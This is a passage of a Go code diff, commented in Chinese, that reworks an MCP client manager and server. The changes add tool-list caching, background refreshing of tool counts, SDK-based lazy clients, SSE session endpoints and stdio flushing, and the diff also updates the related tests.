// 如果有错误但至少返回了一些工具,不返回错误(部分成功)
|
||||
if hasError && len(allTools) == 0 {
|
||||
return nil, fmt.Errorf("获取外部MCP工具失败: %w", lastError)
|
||||
}
|
||||
|
||||
return allTools, nil
|
||||
}
|
||||
|
||||
// getToolsForClient 获取指定客户端的工具列表
|
||||
// 返回工具列表和错误(如果完全无法获取)
|
||||
func (m *ExternalMCPManager) getToolsForClient(name string, client ExternalMCPClient, ctx context.Context) ([]Tool, error) {
|
||||
status := client.GetStatus()
|
||||
|
||||
// error 状态:不使用缓存,直接返回错误
|
||||
if status == "error" {
|
||||
m.logger.Debug("跳过连接失败的外部MCP(不使用缓存)",
|
||||
zap.String("name", name),
|
||||
zap.String("status", status),
|
||||
)
|
||||
return nil, fmt.Errorf("外部MCP连接失败: %s", name)
|
||||
}
|
||||
|
||||
// 已连接:尝试获取最新工具列表
|
||||
if client.IsConnected() {
|
||||
tools, err := client.ListTools(ctx)
|
||||
if err != nil {
|
||||
// 获取失败,尝试使用缓存
|
||||
return m.getCachedTools(name, "连接正常但获取失败", err)
|
||||
}
|
||||
|
||||
// 获取成功,更新缓存
|
||||
m.updateToolCache(name, tools)
|
||||
return tools, nil
|
||||
}
|
||||
|
||||
// 未连接:根据状态决定是否使用缓存
|
||||
if status == "disconnected" || status == "connecting" {
|
||||
return m.getCachedTools(name, fmt.Sprintf("客户端临时断开(状态: %s)", status), nil)
|
||||
}
|
||||
|
||||
// 其他未知状态,不使用缓存
|
||||
m.logger.Debug("跳过外部MCP(未知状态)",
|
||||
zap.String("name", name),
|
||||
zap.String("status", status),
|
||||
)
|
||||
return nil, fmt.Errorf("外部MCP状态未知: %s (状态: %s)", name, status)
|
||||
}
|
||||
|
||||
// getCachedTools 获取缓存的工具列表
|
||||
func (m *ExternalMCPManager) getCachedTools(name, reason string, originalErr error) ([]Tool, error) {
|
||||
m.toolCacheMu.RLock()
|
||||
cachedTools, hasCache := m.toolCache[name]
|
||||
m.toolCacheMu.RUnlock()
|
||||
|
||||
if hasCache && len(cachedTools) > 0 {
|
||||
m.logger.Debug("使用缓存的工具列表",
|
||||
zap.String("name", name),
|
||||
zap.String("reason", reason),
|
||||
zap.Int("count", len(cachedTools)),
|
||||
zap.Error(originalErr),
|
||||
)
|
||||
return cachedTools, nil
|
||||
}
|
||||
|
||||
// 无缓存,返回错误
|
||||
if originalErr != nil {
|
||||
return nil, fmt.Errorf("获取外部MCP工具失败且无缓存: %w", originalErr)
|
||||
}
|
||||
return nil, fmt.Errorf("外部MCP无缓存工具: %s", name)
|
||||
}
|
||||
|
||||
// updateToolCache 更新工具列表缓存
|
||||
func (m *ExternalMCPManager) updateToolCache(name string, tools []Tool) {
|
||||
m.toolCacheMu.Lock()
|
||||
m.toolCache[name] = tools
|
||||
m.toolCacheMu.Unlock()
|
||||
|
||||
// 如果返回空列表,记录警告
|
||||
if len(tools) == 0 {
|
||||
m.logger.Warn("外部MCP返回空工具列表",
|
||||
zap.String("name", name),
|
||||
zap.String("hint", "服务可能暂时不可用,工具列表为空"),
|
||||
)
|
||||
} else {
|
||||
m.logger.Debug("工具列表缓存已更新",
|
||||
zap.String("name", name),
|
||||
zap.Int("count", len(tools)),
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
// CallTool 调用外部MCP工具(返回执行ID)
|
||||
func (m *ExternalMCPManager) CallTool(ctx context.Context, toolName string, args map[string]interface{}) (*ToolResult, string, error) {
|
||||
// 解析工具名称:name::toolName
|
||||
@@ -278,8 +414,18 @@ func (m *ExternalMCPManager) CallTool(ctx context.Context, toolName string, args
|
||||
return nil, "", fmt.Errorf("外部MCP客户端不存在: %s", mcpName)
|
||||
}
|
||||
|
||||
// 检查连接状态,如果未连接或状态为error,不允许调用
|
||||
if !client.IsConnected() {
|
||||
return nil, "", fmt.Errorf("外部MCP客户端未连接: %s", mcpName)
|
||||
status := client.GetStatus()
|
||||
if status == "error" {
|
||||
// 获取错误信息(如果有)
|
||||
errorMsg := m.GetError(mcpName)
|
||||
if errorMsg != "" {
|
||||
return nil, "", fmt.Errorf("外部MCP连接失败: %s (错误: %s)", mcpName, errorMsg)
|
||||
}
|
||||
return nil, "", fmt.Errorf("外部MCP连接失败: %s", mcpName)
|
||||
}
|
||||
return nil, "", fmt.Errorf("外部MCP客户端未连接: %s (状态: %s)", mcpName, status)
|
||||
}
|
||||
|
||||
// 创建执行记录
|
||||
@@ -532,30 +678,50 @@ func (m *ExternalMCPManager) GetToolStats() map[string]*ToolStats {
|
||||
return result
|
||||
}
|
||||
|
||||
// GetToolCount 获取指定外部MCP的工具数量
|
||||
// GetToolCount 获取指定外部MCP的工具数量(从缓存读取,不阻塞)
|
||||
func (m *ExternalMCPManager) GetToolCount(name string) (int, error) {
|
||||
// 先从缓存读取
|
||||
m.toolCountsMu.RLock()
|
||||
if count, exists := m.toolCounts[name]; exists {
|
||||
m.toolCountsMu.RUnlock()
|
||||
return count, nil
|
||||
}
|
||||
m.toolCountsMu.RUnlock()
|
||||
|
||||
// 如果缓存中没有,检查客户端状态
|
||||
client, exists := m.GetClient(name)
|
||||
if !exists {
|
||||
return 0, fmt.Errorf("客户端不存在: %s", name)
|
||||
}
|
||||
|
||||
if !client.IsConnected() {
|
||||
// 未连接,缓存为0
|
||||
m.toolCountsMu.Lock()
|
||||
m.toolCounts[name] = 0
|
||||
m.toolCountsMu.Unlock()
|
||||
return 0, nil
|
||||
}
|
||||
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
defer cancel()
|
||||
|
||||
tools, err := client.ListTools(ctx)
|
||||
if err != nil {
|
||||
return 0, fmt.Errorf("获取工具列表失败: %w", err)
|
||||
}
|
||||
|
||||
return len(tools), nil
|
||||
// 如果已连接但缓存中没有,触发异步刷新并返回0(避免阻塞)
|
||||
m.triggerToolCountRefresh()
|
||||
return 0, nil
|
||||
}
|
||||
|
||||
// GetToolCounts 获取所有外部MCP的工具数量
|
||||
// GetToolCounts 获取所有外部MCP的工具数量(从缓存读取,不阻塞)
|
||||
func (m *ExternalMCPManager) GetToolCounts() map[string]int {
|
||||
m.toolCountsMu.RLock()
|
||||
defer m.toolCountsMu.RUnlock()
|
||||
|
||||
// 返回缓存的副本,避免外部修改
|
||||
result := make(map[string]int)
|
||||
for k, v := range m.toolCounts {
|
||||
result[k] = v
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// refreshToolCounts 刷新工具数量缓存(后台异步执行)
|
||||
func (m *ExternalMCPManager) refreshToolCounts() {
|
||||
m.mu.RLock()
|
||||
clients := make(map[string]ExternalMCPClient)
|
||||
for k, v := range m.clients {
|
||||
@@ -563,43 +729,153 @@ func (m *ExternalMCPManager) GetToolCounts() map[string]int {
|
||||
}
|
||||
m.mu.RUnlock()
|
||||
|
||||
result := make(map[string]int)
|
||||
newCounts := make(map[string]int)
|
||||
|
||||
// 使用goroutine并发获取每个客户端的工具数量,避免串行阻塞
|
||||
type countResult struct {
|
||||
name string
|
||||
count int
|
||||
}
|
||||
resultChan := make(chan countResult, len(clients))
|
||||
|
||||
for name, client := range clients {
|
||||
go func(n string, c ExternalMCPClient) {
|
||||
if !c.IsConnected() {
|
||||
resultChan <- countResult{name: n, count: 0}
|
||||
return
|
||||
}
|
||||
|
||||
// 使用合理的超时时间(15秒),既能应对网络延迟,又不会过长阻塞
|
||||
// 由于这是后台异步刷新,超时不会影响前端响应
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
|
||||
tools, err := c.ListTools(ctx)
|
||||
cancel()
|
||||
|
||||
if err != nil {
|
||||
errStr := err.Error()
|
||||
// SSE 连接 EOF:远端可能关闭了流或未按规范在流上推送响应,仅首次用 Warn 提示
|
||||
if strings.Contains(errStr, "EOF") || strings.Contains(errStr, "client is closing") {
|
||||
m.logger.Warn("获取外部MCP工具数量失败(SSE 流已关闭或服务端未在流上返回 tools/list 响应)",
|
||||
zap.String("name", n),
|
||||
zap.String("hint", "若为 SSE 连接,请确认服务端保持 GET 流打开并按 MCP 规范以 event: message 推送 JSON-RPC 响应"),
|
||||
zap.Error(err),
|
||||
)
|
||||
} else {
|
||||
m.logger.Warn("获取外部MCP工具数量失败,请检查连接或服务端 tools/list",
|
||||
zap.String("name", n),
|
||||
zap.Error(err),
|
||||
)
|
||||
}
|
||||
resultChan <- countResult{name: n, count: -1} // -1 表示使用旧值
|
||||
return
|
||||
}
|
||||
|
||||
resultChan <- countResult{name: n, count: len(tools)}
|
||||
}(name, client)
|
||||
}
|
||||
|
||||
// 收集结果
|
||||
m.toolCountsMu.RLock()
|
||||
oldCounts := make(map[string]int)
|
||||
for k, v := range m.toolCounts {
|
||||
oldCounts[k] = v
|
||||
}
|
||||
m.toolCountsMu.RUnlock()
|
||||
|
||||
for i := 0; i < len(clients); i++ {
|
||||
result := <-resultChan
|
||||
if result.count >= 0 {
|
||||
newCounts[result.name] = result.count
|
||||
} else {
|
||||
// 获取失败,保留旧值
|
||||
if oldCount, exists := oldCounts[result.name]; exists {
|
||||
newCounts[result.name] = oldCount
|
||||
} else {
|
||||
newCounts[result.name] = 0
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// 更新缓存
|
||||
m.toolCountsMu.Lock()
|
||||
// 更新所有获取到的值
|
||||
for name, count := range newCounts {
|
||||
m.toolCounts[name] = count
|
||||
}
|
||||
// 对于未连接的客户端,设置为0
|
||||
for name, client := range clients {
|
||||
if !client.IsConnected() {
|
||||
result[name] = 0
|
||||
continue
|
||||
m.toolCounts[name] = 0
|
||||
}
|
||||
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
tools, err := client.ListTools(ctx)
|
||||
cancel()
|
||||
|
||||
if err != nil {
|
||||
m.logger.Warn("获取外部MCP工具数量失败",
|
||||
zap.String("name", name),
|
||||
zap.Error(err),
|
||||
)
|
||||
result[name] = 0
|
||||
continue
|
||||
}
|
||||
|
||||
result[name] = len(tools)
|
||||
}
|
||||
|
||||
return result
|
||||
m.toolCountsMu.Unlock()
|
||||
}
|
||||
|
||||
// createClient 创建客户端(不连接)
|
||||
func (m *ExternalMCPManager) createClient(serverCfg config.ExternalMCPServerConfig) ExternalMCPClient {
|
||||
timeout := time.Duration(serverCfg.Timeout) * time.Second
|
||||
if timeout <= 0 {
|
||||
timeout = 30 * time.Second
|
||||
// refreshToolCache 刷新指定MCP的工具列表缓存
|
||||
func (m *ExternalMCPManager) refreshToolCache(name string, client ExternalMCPClient) {
|
||||
if !client.IsConnected() {
|
||||
return
|
||||
}
|
||||
|
||||
// 根据传输模式创建客户端
|
||||
// 检查状态,如果是error状态,不更新缓存
|
||||
status := client.GetStatus()
|
||||
if status == "error" {
|
||||
m.logger.Debug("跳过刷新工具列表缓存(连接失败)",
|
||||
zap.String("name", name),
|
||||
zap.String("status", status),
|
||||
)
|
||||
return
|
||||
}
|
||||
|
||||
// 使用较短的超时时间(5秒)
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
defer cancel()
|
||||
|
||||
tools, err := client.ListTools(ctx)
|
||||
if err != nil {
|
||||
m.logger.Debug("刷新工具列表缓存失败",
|
||||
zap.String("name", name),
|
||||
zap.Error(err),
|
||||
)
|
||||
// 刷新失败时不更新缓存,保留旧缓存(如果有)
|
||||
return
|
||||
}
|
||||
|
||||
// 使用统一的缓存更新方法
|
||||
m.updateToolCache(name, tools)
|
||||
}
|
||||
|
||||
// startToolCountRefresh 启动后台刷新工具数量的goroutine
|
||||
func (m *ExternalMCPManager) startToolCountRefresh() {
|
||||
m.refreshWg.Add(1)
|
||||
go func() {
|
||||
defer m.refreshWg.Done()
|
||||
ticker := time.NewTicker(10 * time.Second) // 每10秒刷新一次
|
||||
defer ticker.Stop()
|
||||
|
||||
// 立即执行一次刷新
|
||||
m.refreshToolCounts()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-ticker.C:
|
||||
m.refreshToolCounts()
|
||||
case <-m.stopRefresh:
|
||||
return
|
||||
}
|
||||
}
|
||||
}()
|
||||
}
|
||||
|
||||
// triggerToolCountRefresh 触发立即刷新工具数量(异步)
|
||||
func (m *ExternalMCPManager) triggerToolCountRefresh() {
|
||||
go m.refreshToolCounts()
|
||||
}
|
||||
|
||||
// createClient 创建客户端(不连接)。统一使用官方 MCP Go SDK 的 lazy 客户端,连接在 Initialize 时完成。
|
||||
func (m *ExternalMCPManager) createClient(serverCfg config.ExternalMCPServerConfig) ExternalMCPClient {
|
||||
transport := serverCfg.Transport
|
||||
if transport == "" {
|
||||
// 如果没有指定transport,根据是否有command或url判断
|
||||
if serverCfg.Command != "" {
|
||||
transport = "stdio"
|
||||
} else if serverCfg.URL != "" {
|
||||
@@ -614,12 +890,23 @@ func (m *ExternalMCPManager) createClient(serverCfg config.ExternalMCPServerConf
|
||||
if serverCfg.URL == "" {
|
||||
return nil
|
||||
}
|
||||
return NewHTTPMCPClient(serverCfg.URL, timeout, m.logger)
|
||||
return newLazySDKClient(serverCfg, m.logger)
|
||||
case "simple_http":
|
||||
// 简单 HTTP(一次 POST 一次响应),用于自建 MCP 等
|
||||
if serverCfg.URL == "" {
|
||||
return nil
|
||||
}
|
||||
return newLazySDKClient(serverCfg, m.logger)
|
||||
case "stdio":
|
||||
if serverCfg.Command == "" {
|
||||
return nil
|
||||
}
|
||||
return NewStdioMCPClient(serverCfg.Command, serverCfg.Args, timeout, m.logger)
|
||||
return newLazySDKClient(serverCfg, m.logger)
|
||||
case "sse":
|
||||
if serverCfg.URL == "" {
|
||||
return nil
|
||||
}
|
||||
return newLazySDKClient(serverCfg, m.logger)
|
||||
default:
|
||||
return nil
|
||||
}
|
||||
@@ -649,10 +936,7 @@ func (m *ExternalMCPManager) doConnect(name string, serverCfg config.ExternalMCP
|
||||
|
||||
// setClientStatus 设置客户端状态(通过类型断言)
|
||||
func (m *ExternalMCPManager) setClientStatus(client ExternalMCPClient, status string) {
|
||||
switch c := client.(type) {
|
||||
case *HTTPMCPClient:
|
||||
c.setStatus(status)
|
||||
case *StdioMCPClient:
|
||||
if c, ok := client.(*lazySDKClient); ok {
|
||||
c.setStatus(status)
|
||||
}
|
||||
}
|
||||
@@ -693,6 +977,14 @@ func (m *ExternalMCPManager) connectClient(name string, serverCfg config.Externa
|
||||
zap.String("name", name),
|
||||
)
|
||||
|
||||
// 连接成功,触发工具数量刷新和工具列表缓存刷新
|
||||
m.triggerToolCountRefresh()
|
||||
m.mu.RLock()
|
||||
if client, exists := m.clients[name]; exists {
|
||||
m.refreshToolCache(name, client)
|
||||
}
|
||||
m.mu.RUnlock()
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
@@ -791,4 +1083,23 @@ func (m *ExternalMCPManager) StopAll() {
|
||||
client.Close()
|
||||
delete(m.clients, name)
|
||||
}
|
||||
|
||||
// 清理所有工具数量缓存
|
||||
m.toolCountsMu.Lock()
|
||||
m.toolCounts = make(map[string]int)
|
||||
m.toolCountsMu.Unlock()
|
||||
|
||||
// 清理所有工具列表缓存
|
||||
m.toolCacheMu.Lock()
|
||||
m.toolCache = make(map[string][]Tool)
|
||||
m.toolCacheMu.Unlock()
|
||||
|
||||
// 停止后台刷新(使用 select 避免重复关闭 channel)
|
||||
select {
|
||||
case <-m.stopRefresh:
|
||||
// 已经关闭,不需要再次关闭
|
||||
default:
|
||||
close(m.stopRefresh)
|
||||
m.refreshWg.Wait()
|
||||
}
|
||||
}
|
||||
|
||||
@@ -151,48 +151,26 @@ func TestExternalMCPManager_LoadConfigs(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestHTTPMCPClient_Initialize(t *testing.T) {
|
||||
// 注意:这个测试需要一个真实的HTTP MCP服务器
|
||||
// 如果没有服务器,这个测试会失败
|
||||
// 在实际测试中,可以使用mock服务器
|
||||
// TestLazySDKClient_InitializeFails 验证无效配置时 SDK 客户端 Initialize 失败并设置 error 状态
|
||||
func TestLazySDKClient_InitializeFails(t *testing.T) {
|
||||
logger := zap.NewNop()
|
||||
client := NewHTTPMCPClient("http://127.0.0.1:8081/mcp", 5*time.Second, logger)
|
||||
|
||||
// 使用不存在的 HTTP 地址,Initialize 应失败
|
||||
cfg := config.ExternalMCPServerConfig{
|
||||
Transport: "http",
|
||||
URL: "http://127.0.0.1:19999/nonexistent",
|
||||
Timeout: 2,
|
||||
}
|
||||
c := newLazySDKClient(cfg, logger)
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
defer cancel()
|
||||
|
||||
// 这个测试可能会失败,如果没有真实的服务器
|
||||
// 在实际环境中,应该使用mock服务器
|
||||
err := client.Initialize(ctx)
|
||||
if err != nil {
|
||||
t.Logf("初始化失败(可能是没有服务器): %v", err)
|
||||
err := c.Initialize(ctx)
|
||||
if err == nil {
|
||||
t.Fatal("expected error when connecting to invalid server")
|
||||
}
|
||||
|
||||
status := client.GetStatus()
|
||||
if status == "" {
|
||||
t.Error("状态不应该为空")
|
||||
if c.GetStatus() != "error" {
|
||||
t.Errorf("expected status error, got %s", c.GetStatus())
|
||||
}
|
||||
|
||||
client.Close()
|
||||
}
|
||||
|
||||
func TestStdioMCPClient_Initialize(t *testing.T) {
|
||||
// 注意:这个测试需要一个真实的stdio MCP服务器
|
||||
// 如果没有服务器,这个测试会失败
|
||||
logger := zap.NewNop()
|
||||
client := NewStdioMCPClient("echo", []string{"test"}, 5*time.Second, logger)
|
||||
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
defer cancel()
|
||||
|
||||
// 这个测试可能会失败,因为echo不是MCP服务器
|
||||
// 在实际环境中,应该使用真实的MCP服务器或mock
|
||||
err := client.Initialize(ctx)
|
||||
if err != nil {
|
||||
t.Logf("初始化失败(echo不是MCP服务器): %v", err)
|
||||
}
|
||||
|
||||
client.Close()
|
||||
c.Close()
|
||||
}
|
||||
|
||||
func TestExternalMCPManager_StartStopClient(t *testing.T) {
|
||||
|
||||
@@ -1,6 +1,7 @@
|
||||
package mcp
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
@@ -125,6 +126,13 @@ func (s *Server) HandleHTTP(w http.ResponseWriter, r *http.Request) {
|
||||
return
|
||||
}
|
||||
|
||||
// 官方 MCP SSE 规范:带 sessionid 的 POST 表示消息发往该 SSE 会话,响应通过 SSE 流返回
|
||||
if sessionID := r.URL.Query().Get("sessionid"); sessionID != "" {
|
||||
s.serveSSESessionMessage(w, r, sessionID)
|
||||
return
|
||||
}
|
||||
|
||||
// 简单 POST:请求体为 JSON-RPC,响应在 body 中返回
|
||||
body, err := io.ReadAll(r.Body)
|
||||
if err != nil {
|
||||
s.sendError(w, nil, -32700, "Parse error", err.Error())
|
||||
@@ -137,14 +145,56 @@ func (s *Server) HandleHTTP(w http.ResponseWriter, r *http.Request) {
|
||||
return
|
||||
}
|
||||
|
||||
// 处理消息
|
||||
response := s.handleMessage(&msg)
|
||||
|
||||
w.Header().Set("Content-Type", "application/json")
|
||||
json.NewEncoder(w).Encode(response)
|
||||
}
|
||||
|
||||
// handleSSE 处理SSE连接(用于MCP HTTP传输的事件通道)
|
||||
// serveSSESessionMessage 处理发往 SSE 会话的 POST:读取 JSON-RPC 请求,处理后将响应通过该会话的 SSE 流推送
|
||||
func (s *Server) serveSSESessionMessage(w http.ResponseWriter, r *http.Request, sessionID string) {
|
||||
s.mu.RLock()
|
||||
client, exists := s.sseClients[sessionID]
|
||||
s.mu.RUnlock()
|
||||
if !exists || client == nil {
|
||||
http.Error(w, "session not found", http.StatusNotFound)
|
||||
return
|
||||
}
|
||||
|
||||
body, err := io.ReadAll(r.Body)
|
||||
if err != nil {
|
||||
http.Error(w, "failed to read body", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
|
||||
var msg Message
|
||||
if err := json.Unmarshal(body, &msg); err != nil {
|
||||
http.Error(w, "failed to parse body", http.StatusBadRequest)
|
||||
return
|
||||
}
|
||||
|
||||
response := s.handleMessage(&msg)
|
||||
if response == nil {
|
||||
w.WriteHeader(http.StatusAccepted)
|
||||
return
|
||||
}
|
||||
|
||||
respBytes, err := json.Marshal(response)
|
||||
if err != nil {
|
||||
http.Error(w, "failed to encode response", http.StatusInternalServerError)
|
||||
return
|
||||
}
|
||||
|
||||
select {
|
||||
case client.send <- respBytes:
|
||||
w.WriteHeader(http.StatusAccepted)
|
||||
default:
|
||||
http.Error(w, "session send buffer full", http.StatusServiceUnavailable)
|
||||
}
|
||||
}
|
||||
|
||||
// handleSSE 处理 SSE 连接,兼容官方 MCP 2024-11-05 SSE 规范:
|
||||
// 1. 首个事件必须为 event: endpoint,data 为客户端 POST 消息的 URL(含 sessionid)
|
||||
// 2. 后续事件为 event: message,data 为 JSON-RPC 响应
|
||||
func (s *Server) handleSSE(w http.ResponseWriter, r *http.Request) {
|
||||
flusher, ok := w.(http.Flusher)
|
||||
if !ok {
|
||||
@@ -157,16 +207,25 @@ func (s *Server) handleSSE(w http.ResponseWriter, r *http.Request) {
|
||||
w.Header().Set("Connection", "keep-alive")
|
||||
w.Header().Set("X-Accel-Buffering", "no")
|
||||
|
||||
sessionID := uuid.New().String()
|
||||
client := &sseClient{
|
||||
id: uuid.New().String(),
|
||||
send: make(chan []byte, 8),
|
||||
id: sessionID,
|
||||
send: make(chan []byte, 32),
|
||||
}
|
||||
|
||||
s.addSSEClient(client)
|
||||
defer s.removeSSEClient(client.id)
|
||||
|
||||
// 发送初始ready事件,告知客户端连接成功
|
||||
fmt.Fprintf(w, "event: message\ndata: {\"type\":\"ready\",\"status\":\"ok\"}\n\n")
|
||||
// 官方规范:首个事件为 endpoint,data 为消息端点 URL(客户端将向该 URL POST 请求)
|
||||
scheme := "http"
|
||||
if r.TLS != nil {
|
||||
scheme = "https"
|
||||
}
|
||||
if r.URL.Scheme != "" {
|
||||
scheme = r.URL.Scheme
|
||||
}
|
||||
endpointURL := fmt.Sprintf("%s://%s%s?sessionid=%s", scheme, r.Host, r.URL.Path, sessionID)
|
||||
fmt.Fprintf(w, "event: endpoint\ndata: %s\n\n", endpointURL)
|
||||
flusher.Flush()
|
||||
|
||||
ticker := time.NewTicker(15 * time.Second)
|
||||
@@ -183,7 +242,6 @@ func (s *Server) handleSSE(w http.ResponseWriter, r *http.Request) {
|
||||
fmt.Fprintf(w, "event: message\ndata: %s\n\n", msg)
|
||||
flusher.Flush()
|
||||
case <-ticker.C:
|
||||
// 心跳保持连接
|
||||
fmt.Fprintf(w, ": ping\n\n")
|
||||
flusher.Flush()
|
||||
}
|
||||
@@ -311,6 +369,7 @@ func (s *Server) handleListTools(msg *Message) *Message {
|
||||
tools = append(tools, tool)
|
||||
}
|
||||
s.mu.RUnlock()
|
||||
s.logger.Debug("tools/list 请求", zap.Int("返回工具数", len(tools)))
|
||||
|
||||
response := ListToolsResponse{Tools: tools}
|
||||
result, _ := json.Marshal(response)
|
||||
@@ -1110,10 +1169,11 @@ func (s *Server) RegisterResource(resource *Resource) {
|
||||
}
|
||||
|
||||
// HandleStdio 处理标准输入输出(用于 stdio 传输模式)
|
||||
// MCP 协议使用换行分隔的 JSON-RPC 消息
|
||||
// MCP 协议使用换行分隔的 JSON-RPC 消息;管道下需每次写入后 Flush,否则客户端会读不到响应
|
||||
func (s *Server) HandleStdio() error {
|
||||
decoder := json.NewDecoder(os.Stdin)
|
||||
encoder := json.NewEncoder(os.Stdout)
|
||||
stdout := bufio.NewWriter(os.Stdout)
|
||||
encoder := json.NewEncoder(stdout)
|
||||
// 注意:不设置缩进,MCP 协议期望紧凑的 JSON 格式
|
||||
|
||||
for {
|
||||
@@ -1134,6 +1194,9 @@ func (s *Server) HandleStdio() error {
|
||||
if err := encoder.Encode(errorMsg); err != nil {
|
||||
return fmt.Errorf("发送错误响应失败: %w", err)
|
||||
}
|
||||
if err := stdout.Flush(); err != nil {
|
||||
return fmt.Errorf("刷新 stdout 失败: %w", err)
|
||||
}
|
||||
continue
|
||||
}
|
||||
|
||||
@@ -1149,6 +1212,9 @@ func (s *Server) HandleStdio() error {
|
||||
if err := encoder.Encode(response); err != nil {
|
||||
return fmt.Errorf("发送响应失败: %w", err)
|
||||
}
|
||||
if err := stdout.Flush(); err != nil {
|
||||
return fmt.Errorf("刷新 stdout 失败: %w", err)
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
|
||||
@@ -1,11 +1,22 @@
|
||||
package mcp
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"time"
|
||||
)
|
||||
|
||||
// ExternalMCPClient 外部 MCP 客户端接口(由 client_sdk.go 基于官方 SDK 实现)
|
||||
type ExternalMCPClient interface {
|
||||
Initialize(ctx context.Context) error
|
||||
ListTools(ctx context.Context) ([]Tool, error)
|
||||
CallTool(ctx context.Context, name string, args map[string]interface{}) (*ToolResult, error)
|
||||
Close() error
|
||||
IsConnected() bool
|
||||
GetStatus() string
|
||||
}
|
||||
|
||||
// MCP消息类型
|
||||
const (
|
||||
MessageTypeRequest = "request"
|
||||
@@ -29,21 +40,21 @@ func (m *MessageID) UnmarshalJSON(data []byte) error {
|
||||
m.value = nil
|
||||
return nil
|
||||
}
|
||||
|
||||
|
||||
// 尝试解析为字符串
|
||||
var str string
|
||||
if err := json.Unmarshal(data, &str); err == nil {
|
||||
m.value = str
|
||||
return nil
|
||||
}
|
||||
|
||||
|
||||
// 尝试解析为数字
|
||||
var num json.Number
|
||||
if err := json.Unmarshal(data, &num); err == nil {
|
||||
m.value = num
|
||||
return nil
|
||||
}
|
||||
|
||||
|
||||
return fmt.Errorf("invalid id type")
|
||||
}
|
||||
|
||||
@@ -81,15 +92,15 @@ type Message struct {
|
||||
|
||||
// Error 表示MCP错误
|
||||
type Error struct {
|
||||
Code int `json:"code"`
|
||||
Message string `json:"message"`
|
||||
Code int `json:"code"`
|
||||
Message string `json:"message"`
|
||||
Data interface{} `json:"data,omitempty"`
|
||||
}
|
||||
|
||||
// Tool 表示MCP工具定义
|
||||
type Tool struct {
|
||||
Name string `json:"name"`
|
||||
Description string `json:"description"` // 详细描述
|
||||
Description string `json:"description"` // 详细描述
|
||||
ShortDescription string `json:"shortDescription,omitempty"` // 简短描述(用于工具列表,减少token消耗)
|
||||
InputSchema map[string]interface{} `json:"inputSchema"`
|
||||
}
|
||||
@@ -127,9 +138,9 @@ type ClientInfo struct {
|
||||
|
||||
// InitializeResponse 初始化响应
|
||||
type InitializeResponse struct {
|
||||
ProtocolVersion string `json:"protocolVersion"`
|
||||
Capabilities ServerCapabilities `json:"capabilities"`
|
||||
ServerInfo ServerInfo `json:"serverInfo"`
|
||||
ProtocolVersion string `json:"protocolVersion"`
|
||||
Capabilities ServerCapabilities `json:"capabilities"`
|
||||
ServerInfo ServerInfo `json:"serverInfo"`
|
||||
}
|
||||
|
||||
// ServerCapabilities 服务器能力
|
||||
@@ -178,31 +189,31 @@ type CallToolResponse struct {
|
||||
|
||||
// ToolExecution 工具执行记录
|
||||
type ToolExecution struct {
|
||||
ID string `json:"id"`
|
||||
ToolName string `json:"toolName"`
|
||||
Arguments map[string]interface{} `json:"arguments"`
|
||||
Status string `json:"status"` // pending, running, completed, failed
|
||||
Result *ToolResult `json:"result,omitempty"`
|
||||
Error string `json:"error,omitempty"`
|
||||
StartTime time.Time `json:"startTime"`
|
||||
EndTime *time.Time `json:"endTime,omitempty"`
|
||||
Duration time.Duration `json:"duration,omitempty"`
|
||||
ID string `json:"id"`
|
||||
ToolName string `json:"toolName"`
|
||||
Arguments map[string]interface{} `json:"arguments"`
|
||||
Status string `json:"status"` // pending, running, completed, failed
|
||||
Result *ToolResult `json:"result,omitempty"`
|
||||
Error string `json:"error,omitempty"`
|
||||
StartTime time.Time `json:"startTime"`
|
||||
EndTime *time.Time `json:"endTime,omitempty"`
|
||||
Duration time.Duration `json:"duration,omitempty"`
|
||||
}
|
||||
|
||||
// ToolStats 工具统计信息
|
||||
type ToolStats struct {
|
||||
ToolName string `json:"toolName"`
|
||||
TotalCalls int `json:"totalCalls"`
|
||||
SuccessCalls int `json:"successCalls"`
|
||||
FailedCalls int `json:"failedCalls"`
|
||||
ToolName string `json:"toolName"`
|
||||
TotalCalls int `json:"totalCalls"`
|
||||
SuccessCalls int `json:"successCalls"`
|
||||
FailedCalls int `json:"failedCalls"`
|
||||
LastCallTime *time.Time `json:"lastCallTime,omitempty"`
|
||||
}
|
||||
|
||||
// Prompt 提示词模板
|
||||
type Prompt struct {
|
||||
Name string `json:"name"`
|
||||
Description string `json:"description,omitempty"`
|
||||
Arguments []PromptArgument `json:"arguments,omitempty"`
|
||||
Name string `json:"name"`
|
||||
Description string `json:"description,omitempty"`
|
||||
Arguments []PromptArgument `json:"arguments,omitempty"`
|
||||
}
|
||||
|
||||
// PromptArgument 提示词参数
|
||||
@@ -257,11 +268,11 @@ type ResourceContent struct {
|
||||
|
||||
// SamplingRequest 采样请求
|
||||
type SamplingRequest struct {
|
||||
Messages []SamplingMessage `json:"messages"`
|
||||
Model string `json:"model,omitempty"`
|
||||
MaxTokens int `json:"maxTokens,omitempty"`
|
||||
Temperature float64 `json:"temperature,omitempty"`
|
||||
TopP float64 `json:"topP,omitempty"`
|
||||
Messages []SamplingMessage `json:"messages"`
|
||||
Model string `json:"model,omitempty"`
|
||||
MaxTokens int `json:"maxTokens,omitempty"`
|
||||
Temperature float64 `json:"temperature,omitempty"`
|
||||
TopP float64 `json:"topP,omitempty"`
|
||||
}
|
||||
|
||||
// SamplingMessage 采样消息
|
||||
@@ -272,9 +283,9 @@ type SamplingMessage struct {
|
||||
|
||||
// SamplingResponse 采样响应
|
||||
type SamplingResponse struct {
|
||||
